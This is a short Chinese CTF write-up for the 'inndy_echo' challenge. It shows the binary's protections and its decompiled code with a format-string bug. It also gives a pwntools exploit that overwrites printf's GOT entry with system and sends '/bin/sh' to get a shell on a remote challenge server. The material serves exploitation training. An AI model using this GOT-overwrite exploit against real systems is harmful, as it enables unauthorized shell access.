主页 > 开源代码  > 

inndy_echo

inndy_echo
inndy_echo Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)

32位,只开了NX

int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char s; // [esp+Ch] [ebp-10Ch] unsigned int v4; // [esp+10Ch] [ebp-Ch] v4 = __readgsdword(0x14u); setvbuf(stdin, 0, 2, 0); setvbuf(stdout, 0, 2, 0); do { fgets(&s, 0x100, stdin); printf(&s); } while ( strcmp(&s, "exit\n") ); system("echo Goodbye"); exit(0); }

程序很简单,给了格式化字符串漏洞,并且给了system

思路

改printf@got-->system 输入/bin/sh

from pwn import* from Yapack import * r,elf=rec("node4.buuoj ",25120,"./pwn",10) context(os='linux', arch='i386',log_level='debug') #debug('b *0x80485b9') pl=fmtstr_payload(7,{elf.got['printf']:elf.sym['system']}) sl(pl) sl(b'/bin/sh\x00') ia(c)

标签:

inndy_echo由讯客互联开源代码栏目发布,感谢您对讯客互联的认可,以及对我们原创作品以及文章的青睐,非常欢迎各位朋友分享到个人网站或者朋友圈,但转载请说明文章出处“inndy_echo

上一篇
信息安全第四周

下一篇
Mysql生产随笔

推荐文章